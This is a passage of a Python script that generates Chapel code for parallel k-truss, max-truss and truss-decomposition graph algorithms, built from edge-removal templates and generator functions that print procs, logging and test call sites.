if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[j].sub(1);
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]<=-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if ((EdgeDeleted[e2]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[e2].sub(1);
}
}
}
}
} else {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]<=-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if ((EdgeDeleted[e2]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
TriCount[e2].sub(1);
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) ) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
//writeln("In ", tmpN2, " iteraton,", SetCurF.getSize(), " edges have been removed");
SetCurF.clear();
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
SetNextF.clear();
tmpN2+=1;
}// end of while
'''
# Chapel body for the mixed-direction atomic k-truss variant.
TrussMixAtomic=TimerAndNoWhileStart+MixMinSearchTriCountAtomic+WhileAndAffectEdgeRemoveStart+MixMinSearchAffectedEdgeRemoval
#TrussAtomic=TimerAndNoWhileStart+MinSearchTriCount+WhileAndAffectEdgeRemoveStart+MinSearchAffectedEdgeRemoval
# Chapel preamble for max-truss search: start the timer and perform one marking
# pass that flags every live edge with support < k-2 as deleted (value 1-k).
# The outer while-loop is intentionally disabled (plain block instead).
MaxTrussStart='''
timer.start();
ConFlag=true;
//while (ConFlag) {
{
// here we mark the edges whose number of triangles is less than k-2 as 1-k
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
'''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<=dv4) {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_iR[sv1];
nextEnd=start_iR[sv1]+neiR[sv1]-1;
if (neiR[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//sv1==v3
var v4=dstR[j];
var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
var tmpe:int;
if (e1!=-1) {
if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
// we first check if the two different vertices can be the third edge
var dv4=nei[v4]+neiR[v4];
if ldv2<dv4 {
tmpe=findEdge(lv2,v4);
} else {
tmpe=findEdge(v4,lv2);
}
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
}// end of affected edge search
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each locale only check its owned edges
if (EdgeDeleted[j]==-1) {
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
} //end coforall loc in Locales
tmpN2+=1;
SetNextF.clear();
}// end of while
'''
# Chapel body for max-truss search: marking preamble plus min-search removal loop.
MaxTrussAtomic=MaxTrussStart+MinSearchAffectedEdgeRemoval
# NOTE(review): unassigned triple-quoted literal — an inert expression statement
# (disabled code kept for reference); it has no effect at runtime.
'''
timer.start();
ConFlag=true;
//while (ConFlag) {
{
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
'''
'''
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
} else {
if (dv2>0) {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (EdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if (EdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
RemovedEdge.add(SetCurF.getSize());
//writeln("In ", tmpN2, " iteraton,", SetCurF.getSize(), " edges have been removed");
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall (i,j) in SetNextF {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
'''
# Chapel body for the mixed-direction max-truss search.
MaxTrussMixAtomic=MaxTrussStart+MixMinSearchAffectedEdgeRemoval
# Chapel epilogue for a k-truss proc: decide whether another outer iteration is
# needed, stop the timer, and record whether every edge was removed.
TrussEndCheck='''
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
if (RemovedEdge.read()<Ne) {
AllRemoved=false;
}
'''
# Chapel epilogue for a max-truss proc: after the loop, return false as soon as
# any undeleted edge remains (i.e. not all edges were removed at this k).
MaxTrussEndCheck='''
N2+=1;
}// end while
var tmpi=0;
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
return false;
} else {
tmpi+=1;
}
}
'''
# Chapel epilogue for truss decomposition: when the current k converges but
# edges remain, bump k and continue; track the largest removed count seen.
DecompositionEndCheck='''
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
if (ConFlag==false) {
if (RemovedEdge.read()<Ne) {
ConFlag=true;
k=k+1;
largest=RemovedEdge.read();
}
}
//writeln("In ", N2, " iteraton,", RemovedEdge.read(), " edges have been removed");
N2+=1;
}// end while
timer.stop();
'''
def GenTrussOutput(name):
    """Print Chapel logging statements that summarize a finished k-truss run.

    name -- the Chapel proc name embedded in each log message.
    """
    # Every summary message is followed by the identical smLogger.debug call.
    tails = (
        ', Given K ="+k:string;',
        ', Total execution time="+(timer.elapsed()):string;',
        ', Total number of iterations ="+N2:string;',
        ', The k truss has edges ="+(Ne-RemovedEdge.read()):string;',
    )
    for tail in tails:
        print(' outMsg="After ' + name + tail)
        print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
def GenDecompositionOutput(name):
    """Print Chapel logging statements that summarize a truss-decomposition run.

    name -- the Chapel proc name embedded in each log message.
    """
    # Every summary message is followed by the identical smLogger.debug call.
    tails = (
        ', Max K ="+(k-1):string;',
        ', Total execution time="+(timer.elapsed()):string;',
        ', Total number of iterations ="+N2:string;',
        ', The largest number of k truss edges ="+(Ne-largest):string;',
    )
    for tail in tails:
        print(' outMsg="After ' + name + tail)
        print(" smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);")
def GenReturn(FunName):
    """Print the Chapel epilogue that registers EdgeDeleted in the symbol table,
    returns the reply message, and closes the proc named FunName."""
    epilogue = '''
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
'''
    print(epilogue)
    print(" }// end of proc " + FunName)
    # Three blank separator lines between generated procs.
    for _ in range(3):
        print("")
def GenMaxReturn(FunName):
    """Print the Chapel epilogue for a max-truss proc: a `return true;`
    statement followed by the proc-closing brace."""
    print('''
return true;
''')
    print(" }// end of proc " + FunName)
    # Three blank separator lines between generated procs.
    for _ in range(3):
        print("")
def GenTrussFun(FunName,Parameters,BodyCode):
    """Print a complete Chapel k-truss proc.

    Emits: proc header, shared prologue (FunStart), the algorithm body,
    the loop-termination check, summary logging, and the return epilogue.
    """
    print(" proc " + FunName + Parameters)
    print(FunStart)
    print(BodyCode)
    print(TrussEndCheck)
    GenTrussOutput(FunName)
    GenReturn(FunName)
def GenMaxTrussFunAtomic(FunName,MaxParameters,BodyCode):
    """Print a complete Chapel max-truss proc (atomic TriCount variant).

    Emits: proc header, atomic prologue (MaxFunStartAtomic), the algorithm
    body, the all-removed check, and the boolean return epilogue.
    """
    print(" proc " + FunName + MaxParameters)
    print(MaxFunStartAtomic)
    print(BodyCode)
    print(MaxTrussEndCheck)
    GenMaxReturn(FunName)
def GenDecompositionFun(FunName,Parameters,BodyCode):
    """Print a complete Chapel truss-decomposition proc.

    Emits: proc header, shared prologue (FunStart), the algorithm body,
    the decomposition end-check, summary logging, and the return epilogue.
    """
    print(" proc " + FunName + Parameters)
    print(FunStart)
    print(BodyCode)
    print(DecompositionEndCheck)
    GenDecompositionOutput(FunName)
    GenReturn(FunName)
def GenNaiveTrussTest(FunName):
    """Print the Chapel call-site snippet that resets PTriCount and invokes
    the naive k-truss proc FunName with the user-supplied kValue."""
    reset = '''
PTriCount=0;
'''
    args = '''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
'''
    print(reset)
    print(" repMsg=" + FunName + "(kValue,")
    print(args)
def GenNaiveDecompositionTest(FunName):
    """Print the Chapel call-site snippet that resets PTriCount and invokes
    the naive decomposition proc FunName with a fixed starting k of 3."""
    reset = '''
PTriCount=0;
'''
    args = '''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, PTriCount);
'''
    print(reset)
    print(" repMsg=" + FunName + "(3,")
    print(args)
def GenTrussAtomicTest(FunName):
    """Print the Chapel call-site snippet that zeroes AtoTriCount and invokes
    the atomic k-truss proc FunName with the user-supplied kValue."""
    reset = '''
forall i in AtoTriCount {
i.write(0);
}
'''
    args = '''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
'''
    print(reset)
    print(" repMsg=" + FunName + "(kValue,")
    print(args)
def GenMaxTrussAtomicTest(FunName1,FunName2):
    """Print the Chapel driver that binary-searches the maximum truss k.

    FunName1 -- proc used for the initial k=3 truss pass.
    FunName2 -- proc used to test whether a candidate k removes all edges.

    The emitted code runs k=3 first, estimates an upper bound kUp via getupK,
    then narrows [kLow, kUp] with kMid probes until the maximum k is found,
    finally registering lEdgeDeleted in the symbol table and logging timings.
    """
    # Reset counters/timers and run the initial k=3 pass.
    text1='''
maxtimer.clear();
forall i in 0..Ne-1 {
aPTriCount[i].write(0);
aPlTriCount[i].write(0);
}
EdgeDeleted=-1;
lEdgeDeleted=-1;//for local use
maxtimer.start();
kLow=3;
// we first check kLow=3
'''
    text2=" repMsg="+FunName1+"(kLow,"
    # Arguments for the k=3 call, then snapshot results and estimate kUp.
    text3='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount);
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
aPTriCount[i].write(aPlTriCount[i].read());
}
kUp=getupK(toSymEntry(ag.getNEIGHBOR(), int).a, toSymEntry(ag.getNEIGHBOR_R(), int).a);
outMsg="Estimated kUp="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if ((!AllRemoved) && (kUp>3)) {// we need to check if max k >3
var ConLoop=true:bool;
while ( (ConLoop) && (kLow<kUp)) {
// we will continuely check if the up value can remove all edges
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(aPTriCount[i].read());
}
// we check the larget k vaule kUp which is the upper bound of max k
// we will use kMid to reduce kUp
'''
    # Probe kUp itself.
    text4="                 AllRemoved="+FunName2+"(kUp,"
    text5='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (!AllRemoved) { //the up value is the max k
ConLoop=false;
} else {// we will check the mid value to reduce kUp
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(aPTriCount[i].read());
}
//"Try mid=",kMid);
'''
    # Probe kMid.
    text6="                 AllRemoved="+FunName2+"(kMid,"
    text7='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (AllRemoved) { // if mid value can remove all edges, we will reduce the up value for checking
kUp=kMid-1;
} else { // we will improve both low and mid value
if kMid>=kUp-1 {
ConLoop=false;
kUp=kMid;
} else {// we will update the low value and then check the mid value
// until all edges are removed
while ((AllRemoved==false) && (kMid<kUp-1)) {
kLow=kMid;
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
EdgeDeleted[i]=lEdgeDeleted[i];
aPTriCount[i].write(aPlTriCount[i].read());
}
//("Try mid again=",kMid);
'''
    # Re-probe the updated kMid inside the inner loop.
    text8="                 AllRemoved="+FunName2+"(kMid,"
    text9='''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
}
if (!AllRemoved) {
kUp=kMid;
ConLoop=false;
} else {
kUp=kMid-1;
}
}
}
}
}// end of while
var countName = st.nextName();
var countEntry = new shared SymEntry(lEdgeDeleted);
st.addEntry(countName, countEntry);
repMsg = 'created ' + st.attrib(countName);
maxtimer.stop();
'''
    # Logging for the kUp>3 branch.
    text10=' outMsg="After '+FunName2+', Total execution time ="+(maxtimer.elapsed()):string;'
    text11='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
'''
    text12=' outMsg="After '+FunName2+', Max k="+kUp:string;'
    text13='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {//kUp<=3 or AllRemoved==true
maxtimer.stop();
'''
    # Logging for the kUp<=3 / all-removed branch (max k is 3 or 2).
    text14=' outMsg="After '+FunName2+',Total execution time ="+(maxtimer.elapsed()):string;'
    text15='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if (AllRemoved==false) {
'''
    text16=' outMsg="After '+FunName2+', Max k=3";'
    text17='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {
'''
    text18=' outMsg="After '+FunName2+',Max k=2";'
    text19='''
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
}
}
'''
    # Emit the fragments in order to form the complete driver.
    print(text1)
    print(text2)
    print(text3)
    print(text4)
    print(text5)
    print(text6)
    print(text7)
    print(text8)
    print(text9)
    print(text10)
    print(text11)
    print(text12)
    print(text13)
    print(text14)
    print(text15)
    print(text16)
    print(text17)
    print(text18)
    print(text19)
def GenDecompositionAtomicTest(FunName):
    """Print the Chapel call-site snippet that zeroes AtoTriCount and invokes
    the atomic decomposition proc FunName with a fixed starting k of 3."""
    reset = '''
forall i in AtoTriCount {
i.write(0);
}
'''
    args = '''
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
'''
    print(reset)
    print(" repMsg=" + FunName + "(3,")
    print(args)
def GenTrussTest():
    """Print the dispatch section that runs every k-truss implementation
    when the request carries kValue>0."""
    print('''
if (kValue>0) {// k-truss analysis
''')
    print('''
var PTriCount=makeDistArray(Ne,int);
''')
    # Call-sites for each naive (non-atomic) variant.
    for naive in (
        "kTrussNaiveListIntersection",
        "kTrussNaiveSetSearchSmall",
        "kTrussNaiveSetSearchSmallSeq",
        "kTrussNaivePathMerge",
        "kTrussNaiveMinSearch",
    ):
        GenNaiveTrussTest(naive)
    print('''
var AtoTriCount=makeDistArray(Ne,atomic int);
''')
    # Call-sites for the atomic variants.
    for atomic_fun in ("kTruss", "kTrussMix"):
        GenTrussAtomicTest(atomic_fun)
    print('''
}// end of k-truss analysis
''')
def GenMaxTrussTest():
    """Print the dispatch section that runs the max k-truss search
    when the request carries kValue==-1."""
    print('''
if (kValue==-1) {// max k-truss analysis
''')
    print('''
var PTriCount=makeDistArray(Ne,int);
''')
    # Naive max-truss variants are currently disabled; kept for reference.
    # GenNaiveMaxTrussTest("kTrussNaiveListIntersection","OnceTrussNaiveListIntersection")
    # GenNaiveMaxTrussTest("kTrussNaiveSetSearchSmall","OnceTrussNaiveSetSearchSmall")
    # GenNaiveMaxTrussTest("kTrussNaiveSetSearchSmallSeq","OnceTrussNaiveSetSearchSmallSeq")
    # GenNaiveMaxTrussTest("kTrussNaivePathMerge","OnceTrussNaivePathMerge")
    # GenNaiveMaxTrussTest("kTrussNaiveMinSearch","OnceTrussNaiveMinSearch")
    print('''
var aPTriCount=makeDistArray(Ne,atomic int);//keep the last no all removed results
var aPlTriCount=makeDistArray(Ne,atomic int);//for local use
''')
    # Atomic max-truss drivers (initial pass proc, probe proc).
    for kfun, oncefun in (("kTruss", "OnceMaxTruss"), ("kTrussMix", "OnceMaxTrussMix")):
        GenMaxTrussAtomicTest(kfun, oncefun)
    print('''
}// end of max k-truss analysis
''')
def GenDecompositionTest():
    """Print the dispatch section that runs truss decomposition
    when the request carries kValue==-2."""
    print('''
if (kValue==-2) {
var PTriCount=makeDistArray(Ne,int);
''')
    # Some naive variants are currently disabled; kept for reference.
    # GenNaiveDecompositionTest("TrussDecompositionNaiveListIntersection")
    # GenNaiveDecompositionTest("TrussDecompositionNaiveSetSearchSmall")
    # GenNaiveDecompositionTest("TrussDecompositionNaiveSetSearchSmallSeq")
